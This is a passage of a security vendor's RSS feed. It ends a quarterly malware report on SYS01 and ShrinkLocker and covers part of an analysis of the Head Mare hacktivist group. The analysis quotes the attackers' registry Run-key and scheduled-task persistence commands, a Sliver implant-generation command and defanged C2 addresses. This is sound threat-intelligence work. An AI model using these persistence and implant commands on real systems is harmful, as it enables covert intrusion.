underdeveloped in terms of functionality and contains many bugs, errors, and redundant code. Considering the effort it takes to install the malware through a long chain of downloaders, the last of which is Penguish, it’s strange that it’s not more advanced.</p><p>SYS01 (aka Album Stealer and S1deload Stealer), a relatively unknown malware that has been around since at least 2022, has evolved from a C# stealer to a PHP stealer. What hasn’t changed is the infection vector. Users are tricked into downloading a malicious ZIP archive disguised as an adult video via a Facebook page.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-113674" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-1024x741.png" alt="" width="1024" height="741" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-1024x741.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-300x217.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-768x556.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-484x350.png 484w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-740x535.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-387x280.png 387w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03-800x579.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184821/it_threat_evolution_q2_2024_03.png 1233w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p><p>The archive contains a legitimate binary that sideloads a malicious DLL. This DLL opens an adult video and executes the next payload, which is a malicious PHP file encoded with <a href="https://www.ioncube.com/php_encoder.php" target="_blank" rel="noopener">ionCube</a>. The executed PHP file calls a script, <em>install.bat</em>, which ultimately executes the next stage by running a PowerShell command. This layer is conveniently named “runalayer” and runs what appears to be the final payload called “Newb”. However, we found a difference between the latest version and the previous publicly disclosed versions of the stealer. The current stealer (Newb) includes functionality to steal Facebook-related data and send stolen browser data to the C2. It also contains backdoor functionality. However, we found that the code that actually collects the browser data sent by Newb is in a different sample named “imageclass”. It is not 100% clear how imageclass was pushed to the system; but looking at the backdoor code of Newb, we concluded with a high degree of certainty that imageclass was later pushed through Newb to the infected machine. The initial ZIP archive also contains another malicious PHP file, <em>include.php</em>: this has similar backdoor functionality to Newb and accepts many of the same commands in the same format.</p><h3 id="shrinklocker-turning-bitlocker-into-a-ransomware-utility">ShrinkLocker: turning BitLocker into a ransomware utility</h3><p>During a recent incident response engagement, we discovered ransomware called “ShrinkLocker” that uses BitLocker to encrypt compromised computers. BitLocker is the full-disk encryption utility built into Windows that is designed to prevent data exposure on lost or stolen computers.</p><p>ShrinkLocker is implemented as a sophisticated VBScript. If the script detects that it’s running on Windows 2000, XP, 2003 or Vista, it shuts down. However, for later versions of Windows, it runs the appropriate portion of its code for the specific operating system. ShrinkLocker shrinks the computer’s drive partitions by 100MB and uses this slack space to create a boot partition for itself. The malware modifies the registry to configure BitLocker to run with the attacker’s settings. It then disables and removes all default BitLocker protections to prevent key recovery and enables the numeric password protection option. The script then generates this password and initiates encryption of all local drives before sending the password and system information to the attacker’s C2 server. Finally, the malware deletes itself and reboots the system.</p><p>If the user tries to use the recovery option while the computer is booting, they will see a message stating that no BitLocker recovery options are available.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113675" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04.png" alt="" width="884" height="645" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04.png 884w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-300x219.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-768x560.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-480x350.png 480w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-740x540.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-384x280.png 384w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30184959/it_threat_evolution_q2_2024_04-800x584.png 800w" sizes="(max-width: 884px) 100vw, 884px" /></a></p><p>ShrinkLocker changes the labels of all system drives to the attacker’s email address instead of leaving a ransom note.</p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-113676" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05.png" alt="" width="780" height="123" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05.png 780w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05-300x47.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05-768x121.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30185540/it_threat_evolution_q2_2024_05-740x117.png 740w" sizes="(max-width: 780px) 100vw, 780px" /></a></p><p>You can read our full analysis of ShrinkLocker <a href="https://securelist.com/ransomware-abuses-bitlocker/112643/" target="_blank" rel="noopener">here</a>.</p>]]></content:encoded> <wfw:commentRss>https://securelist.com/it-threat-evolution-q2-2024/113669/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/03071551/malware-report-q2-2024-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> <item> <title>Head Mare: adventures of a unicorn in Russia and Belarus</title> <link>https://securelist.com/head-mare-hacktivists/113555/</link> <comments>https://securelist.com/head-mare-hacktivists/113555/#respond</comments> <dc:creator><![CDATA[Kaspersky]]></dc:creator> <pubDate>Mon, 02 Sep 2024 10:00:22 +0000</pubDate> <category><![CDATA[Crimeware reports]]></category> <category><![CDATA[Babuk]]></category> <category><![CDATA[Backdoor]]></category> <category><![CDATA[crimeware]]></category> <category><![CDATA[Data Encryption]]></category> <category><![CDATA[hacktivists]]></category> <category><![CDATA[Head Mare]]></category> <category><![CDATA[LockBit]]></category> <category><![CDATA[PhantomDL]]></category> <category><![CDATA[Ransomware]]></category> <category><![CDATA[Targeted attacks]]></category> <category><![CDATA[Trojan]]></category> <category><![CDATA[TTPs]]></category><category><![CDATA[Windows malware]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113555</guid> <description><![CDATA[Analysis of the hacktivist group Head Mare targeting companies in Russia and Belarus: exploitation of WinRAR vulnerability, custom tools PhantomDL and PhantomCore.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/30143637/SL-HeadMare-featured-01-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>Head Mare is a hacktivist group that first made itself known in 2023 on the social network X (formerly Twitter)<a href="#_ftn1" name="_ftnref1"><sup>[1]</sup></a>. In their public posts, the attackers reveal information about some of their victims, including organization names, internal documents stolen during attacks, and screenshots of desktops and administrative consoles.</p><p>By analyzing incidents in Russian companies, we identified how Head Mare conducts its attacks, the tools it uses, and established the group’s connection with <a href="https://securelist.ru/phantomdl-darkwatchman-rat-targeted-attacks/109919/" target="_blank" rel="noopener">the PhantomDL malware (article in Russian)</a>.</p><h2 id="key-findings">Key findings</h2><ul><li>Head Mare exclusively targets companies in Russia and Belarus.</li><li>For initial access, the group conducts various phishing campaigns distributing RAR archives that exploit the CVE-2023-38831 vulnerability in WinRAR.</li><li>Some of the discovered tools overlap with previously investigated groups attacking Russian organizations.</li><li>The group encrypts victims’ devices using two ransomware families: LockBit for Windows and Babuk for Linux (ESXi).</li></ul><h2 id="technical-details">Technical details</h2><h3 id="historical-context">Historical context</h3><p>Since the beginning of the Russo-Ukrainian conflict, we’ve seen the emergence of numerous hacktivist groups whose main goal is often not financial gain but causing as much damage as possible to companies on the opposing side of the conflict. Head Mare is one such group, exclusively targeting organizations located in Russia and Belarus. This is confirmed by open-source information and telemetry from the Kaspersky Security Network – a system for collecting anonymized threat data voluntarily provided by users of our solutions.</p><p>Hacktivist groups attacking Russian organizations in the context of the Russo-Ukrainian conflict use similar techniques and tools and, when analyzed using the Unified Kill Chain method, generally resemble one another. However, unlike other similar groups, Head Mare uses more up-to-date methods for obtaining initial access. For instance, the attackers took advantage of the relatively recent CVE-2023-38831 vulnerability in WinRAR, which allows the attacker to execute arbitrary code on the system via a specially prepared archive. This approach allows the group to deliver and disguise the malicious payload more effectively.</p><p>Like most hacktivist groups, Head Mare maintains a public account on the social network X, where they post information about some of their victims. Below is an example of one of their posts:</p><div id="attachment_113571" style="width: 939px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113571" class="size-full wp-image-113571" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06.png" alt="Head Mare post on X" width="929" height="792" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06.png 929w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-300x256.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-768x655.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-411x350.png 411w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-740x631.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-328x280.png 328w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141228/HeadMare-en-ru-es_06-800x682.png 800w" sizes="(max-width: 929px) 100vw, 929px" /></a><p id="caption-attachment-113571" class="wp-caption-text">Head Mare post on X</p></div><p>At the time of carrying out the study, the group has claimed nine victims from various industries:</p><ul><li>Government institutions;</li><li>Transportation;</li><li>Energy;</li><li>Manufacturing;</li><li>Entertainment.</li></ul><p>The ultimate goal of the attackers is likely to cause maximum damage to companies in Russia and Belarus. However, unlike some other hacktivist groups, Head Mare also demands a ransom for data decryption.</p><h3 id="head-mares-toolkit">Head Mare’s toolkit</h3><p>In their attacks, Head Mare mainly uses publicly available software, which is typical of most hacktivist groups targeting Russian companies in the context of the Russo-Ukrainian conflict. However, while some hacktivists have no proprietary developments in their toolkit at all, Head Mare uses their custom malware PhantomDL and PhantomCore in phishing emails for initial access and exploitation.</p><p>Below is a list of software discovered in Head Mare attacks:</p><ul><li>LockBit ransomware;</li><li>Babuk ransomware;</li><li>PhantomDL;</li><li>PhantomCore;</li><li>Sliver;</li><li>ngrok;</li><li>rsockstun;</li><li>XenAllPasswordPro;</li><li>Mimikatz.</li></ul><p>Most of these tools are available on the internet, be it LockBit samples generated using the publicly available builder leaked in 2022, or the Mimikatz utility, whose code is available on GitHub.</p><h3 id="initial-access">Initial access</h3><p>During our investigation of Head Mare’s activities, we discovered that this group is associated with <a href="https://securelist.ru/phantomdl-darkwatchman-rat-targeted-attacks/109919/" target="_blank" rel="noopener">targeted attacks</a> on Russian organizations using malicious PhantomDL and PhantomCore samples. The detected samples were distributed in various phishing campaigns in archives with decoy documents of the same name. The malicious archives exploit the <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831" target="_blank" rel="noopener">CVE-2023-38831</a> vulnerability in WinRAR. If the user attempts to open the legitimate-seeming document, they trigger the execution of the malicious file. The same sample could be distributed in different archives with decoy documents on various topics.</p><div id="attachment_113572" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113572" class="size-large wp-image-113572" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1024x128.png" alt="Verdicts with which our products detect PhantomDL samples: the malware is recognized, among other things, as an exploit for CVE-2023-38831." width="1024" height="128" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1024x128.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-300x38.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-768x96.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1536x192.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-740x93.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-1600x200.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03-800x100.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141349/HeadMare-en-ru-es_03.png 1644w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113572" class="wp-caption-text">Verdicts with which our products detect PhantomDL samples: the malware is recognized, among other things, as an exploit for CVE-2023-38831</p></div><p>After execution, PhantomDL and PhantomCore establish communication with one of the attackers’ command servers and attempt to identify the domain to which the infected host belongs. Below are the results of dynamic analysis of several samples in Kaspersky Sandbox (detonation graphs), reflecting the malware’s behavior immediately after launch.</p><div id="attachment_113573" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113573" class="size-large wp-image-113573" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-1024x359.png" alt="Detonation graph of a PhantomDL sample reflecting its behavior in Kaspersky Sandbox" width="1024" height="359" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-1024x359.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-768x270.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-997x350.png 997w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-740x260.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-798x280.png 798w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10-800x281.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141436/HeadMare-en-ru_10.png 1382w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113573" class="wp-caption-text">Detonation graph of a PhantomDL sample reflecting its behavior in Kaspersky Sandbox</p></div><p>In the image above, the PhantomDL sample connects to the C2 server 91.219.151[.]47 through port 80 and performs domain identification using the command <pre class="crayon-plain-tag">cmd.exe /c "echo %USERDOMAIN%"</pre>.</p><div id="attachment_113574" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113574" class="size-large wp-image-113574" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-1024x196.png" alt="PhantomDL communication with C2" width="1024" height="196" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-1024x196.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-300x57.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-768x147.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-740x141.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01-800x153.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141525/HeadMare-en-ru-es_01.png 1063w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113574" class="wp-caption-text">PhantomDL communication with C2</p></div><p>The PhantomCore sample establishes a connection with another C2 (45.11.27[.]232) and checks the host’s domain using the WinAPI function <pre class="crayon-plain-tag">NetGetJoinInformation</pre>.</p><div id="attachment_113575" style="width: 1004px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113575" class="size-full wp-image-113575" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11.png" alt="PhantomCore sample detonation in Kaspersky Sandbox" width="994" height="512" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11.png 994w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-300x155.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-768x396.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-679x350.png 679w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-740x381.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-544x280.png 544w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141613/HeadMare-en-ru-es_11-800x412.png 800w" sizes="(max-width: 994px) 100vw, 994px" /></a><p id="caption-attachment-113575" class="wp-caption-text">PhantomCore sample detonation in Kaspersky Sandbox</p></div><div id="attachment_113576" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113576" class="size-large wp-image-113576" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1024x122.png" alt="Suspicious activity of the PhantomCore sample" width="1024" height="122" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1024x122.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-300x36.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-768x92.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1536x183.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-740x88.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-1600x191.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16-800x95.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141717/HeadMare-en-ru-es_16.png 1626w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113576" class="wp-caption-text">Suspicious activity of the PhantomCore sample</p></div><p>Another PhantomCore sample, after execution, establishes a connection with C2 5.252.178[.]92:</p><div id="attachment_113577" style="width: 373px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113577" class="size-full wp-image-113577" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14.png" alt="PhantomCore C2 connection" width="363" height="136" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14.png 363w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141749/HeadMare-en-ru-es_14-300x112.png 300w" sizes="(max-width: 363px) 100vw, 363px" /></a><p id="caption-attachment-113577" class="wp-caption-text">PhantomCore C2 connection</p></div><p>During our research, we also found several PhantomDL and PhantomCore samples, which we cannot attribute with complete certainty to the same cluster of activity as the samples found in Head Mare’s attacks. Information about these samples can be found in the section “Samples similar to Head Mare’s toolkit”.</p><h3 id="persistence-in-the-system">Persistence in the system</h3><p>The attackers used several methods to persist in the system. For example, in one incident, they added a PhantomCore sample to the Run registry key. After execution, the sample automatically established a connection with the attackers’ C2 5.252.176[.]47:</p><div id="attachment_113578" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113578" class="size-large wp-image-113578" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-1024x389.png" alt="PhantomCore C2 connection" width="1024" height="389" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-1024x389.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-300x114.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-768x292.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-921x350.png 921w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-740x281.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-737x280.png 737w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08-800x304.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/27141830/HeadMare-en-ru-es_08.png 1247w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113578" class="wp-caption-text">PhantomCore C2 connection</p></div><p>We observed the following commands adding a value to the Run registry key:</p><table width="100%"><tbody><tr><td style="text-align: center" width="50%"><strong>Command</strong></td><td style="text-align: center" width="50%"><strong>Description</strong></td></tr><tr><td>cmd /c “cd /d $selfpath\ && reg add<br />HKCU\Software\Microsoft\Windows\CurrentVersion<br />\Run /v \”MicrosoftUpdateCoree\” /t REG_SZ /d<br />\”$selfpath\$selfname.exe\ /f”</td><td rowspan="2">Adding a value to the Run registry key named MicrosoftUpdateCoree with content $appdata\Microsoft\Windows\srvhostt.exe (PhantomCore) with the /f parameter (no confirmation prompt)</td></tr><tr><td>reg add<br />HKCU\Software\Microsoft\Windows\CurrentVersion<br />\Run /v \”MicrosoftUpdateCoree\” /t REG_SZ /d<br />\”$appdata\Microsoft\Windows\srvhostt.exe\” /f</td></tr><tr><td>reg add<br />HKCU\Software\Microsoft\Windows\CurrentVersion<br />\Run /v \”MicrosoftUpdateCore\” /t REG_SZ /d<br />\”$appdata\Microsoft\Windows\srvhost.exe\” /f</td><td>A similar method of adding to the registry key, but the value is named MicrosoftUpdateCore</td></tr></tbody></table><p>In some other cases, the attackers created scheduled tasks to persist in the victim’s system. The following tasks were used to launch a PhantomCore sample:</p><table width="100%"><tbody><tr><td style="text-align: center" width="50%"><strong>Command</strong></td><td style="text-align: center" width="50%"><strong>Description</strong></td></tr><tr><td>schtasks /create /tn \”MicrosoftUpdateCore\”<br />/tr \”$appdata\Microsoft\Windows\srvhost.exe\”<br />/sc ONLOGON</td><td>Creates a scheduled task named MicrosoftUpdateCore that launches $appdata\Microsoft\Windows\srvhost.exe (PhantomCore) each time the user logs in</td></tr><tr><td>schtasks /create /tn “MicrosoftUpdateCore” /tr<br />“$appdata\Microsoft\Windows\srvhost.exe” /sc<br />ONLOGON /ru “SYSTEM”</td><td>A similar method of creating a scheduled task, but in this case, the task runs with SYSTEM privileges</td></tr></tbody></table><h3 id="detection-evasion">Detection evasion</h3><p>As mentioned in the previous section, the attackers create scheduled tasks and registry values named MicrosoftUpdateCore and MicrosoftUpdateCoree to disguise their activity as tasks related to Microsoft software.</p><p>We also found that some LockBit samples used by the group had the following names:</p><ul><li>OneDrive.exe;</li><li>VLC.exe.</li></ul><p>These samples were located in the C:\ProgramData directory, disguising themselves as legitimate OneDrive and VLC applications.</p><p>In general, many of the tools used by Head Mare had names typical of legitimate programs and were located in standard paths or lookalikes:</p><table width="100%"><tbody><tr><td width="15%"><strong>Software</strong></td><td width="85%"><strong>Path</strong></td></tr><tr><td>Sliver</td><td>C:\Windows\system32\SrvLog.exe</td></tr><tr><td rowspan="2">rsockstun</td><td>c:\Users\<user>\AppData\Local\microsoft\windows\srvhosts.exe</td></tr><tr><td>c:\Users\<user>\AppData\Roaming\microsoft\windows\srvhostt.exe</td></tr><tr><td rowspan="2">Phantom</td><td>c:\windows\srvhost.exe</td></tr><tr><td>c:\Users\<user>\appdata\roaming\microsoft\windows\srvhost.exe</td></tr><tr><td>LockBit</td><td>c:\ProgramData\OneDrive.exe</td></tr></tbody></table><p>As can be seen in the table, the attackers primarily attempted to disguise their samples as legitimate svchost.exe files in the C:\Windows\System32 directory.</p><p>The attackers also used disguise tactics in their phishing campaigns – samples of PhantomDL and PhantomCore were named to resemble business documents and had double extensions. Here are some examples we encountered:</p><ul><li>Счет-Фактура.pdf .exe</li><li>договор_ №367кх_от_29.04.2024_и_доп_соглашение_ртсс 022_контракт.pdf .exe</li><li>решение №201-5_10вэ_001-24 к пив экран-сои-2.pdf .exe</li><li>тз на разработку.pdf .exe</li><li>исходящее письмо от 29.04.2024 n 10677-020-2024.pdf .exe</li><li>возврат средств реквизиты.pdf .exe</li></ul><p>Additionally, all the samples of PhantomDL and PhantomCore we found were obfuscated, possibly using a popular obfuscator for Go called Garble.</p><h3 id="management-and-infrastructure">Management and infrastructure</h3><p>During our research, we discovered that the main C2 framework used by the attackers is Sliver, an open-source C2 framework designed for simulating cyberattacks and pentesting. Such frameworks are used to manage compromised systems after initial access, allowing attackers (or pentesters) to execute commands, gather data, and manage connections.</p><p>Sliver’s architecture includes an agent (implant) installed on compromised devices to execute commands from the server, a server for managing agents and coordinating their actions, and a client in the form of a command-line interface (CLI) for operator-server interaction. Sliver’s core functionality includes managing agents, executing commands via a command shell, creating tunnels to bypass network restrictions, and automating routine tasks with built-in scripts.</p><p>The Sliver implant samples we found had default configurations and were created using the following command:</p><pre class="crayon-plain-tag">generate --http [IP] --os windows --arch amd64 --format exe</pre><p>To disguise the implants, the attackers used the popular Garble tool, which is available on GitHub.</p><p>The attackers also frequently used VPS/VDS servers as C2 servers. Below is a list of servers we observed in attacks:</p><table width="100%"><tbody><tr><td style="text-align: left" width="34%"><strong>IP</strong></td><td style="text-align: left" width="33%"><strong>First detection</strong></td><td style="text-align: left" width="33%"><strong>ASN</strong></td></tr><tr><td>188.127.237[.]46</td><td>March 31, 